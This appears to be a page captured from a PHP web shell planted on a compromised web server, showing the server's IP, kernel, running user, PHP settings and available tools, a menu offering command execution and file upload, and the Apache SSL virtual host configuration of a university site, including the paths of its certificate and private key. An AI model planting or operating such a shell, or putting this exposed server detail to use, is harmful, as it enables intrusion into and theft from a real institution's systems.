|
Server IP : 10.2.73.233 / Your IP : 216.73.216.59 Web Server : Apache/2.4.59 (Debian) System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 User : www-data ( 33) PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ilpnowa/../gp/ilp/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<IfModule mod_ssl.c>
<VirtualHost *:443>
ServerName ilp.uw.edu.pl
ServerAdmin webmaster@localhost
DocumentRoot /home/ilpnowa/web
ServerAlias www.ilp.uw.edu.pl
<FilesMatch \.php$>
# Apache 2.4.10+ can proxy to unix socket
#SetHandler "proxy:unix:/var/run/php/php7.0-fpm.sock|fcgi://localhost/"
#SetHandler "proxy:unix:/var/run/php/php7.1-fpm.sock|fcgi://localhost/"
#SetHandler "proxy:unix:/var/run/php/php7.2-fpm.sock|fcgi://localhost/"
#SetHandler "proxy:unix:/var/run/php/php8.2-fpm.sock|fcgi://localhost/"
SetHandler "proxy:unix:/var/run/php/php7.4-fpm.sock|fcgi://localhost/"
#SetHandler application/x-httpd-php
</FilesMatch>
<Directory /home/ilpnowa/web/>
Options Indexes FollowSymLinks
AllowOverride All
#AllowOverride None
Require all granted
DirectoryIndex index.php
#Redirect "/" http://ilp.uw.edu.pl/
</Directory>
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# Enable/Disable SSL for this virtual host.
SSLEngine on
SSLCertificateFile /etc/apache2/ssl/ilp_uw_edu_pl_2025.pem
SSLCertificateKeyFile /etc/apache2/ssl/ilp_uw_edu_pl_2025.key
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>
</VirtualHost>
</IfModule>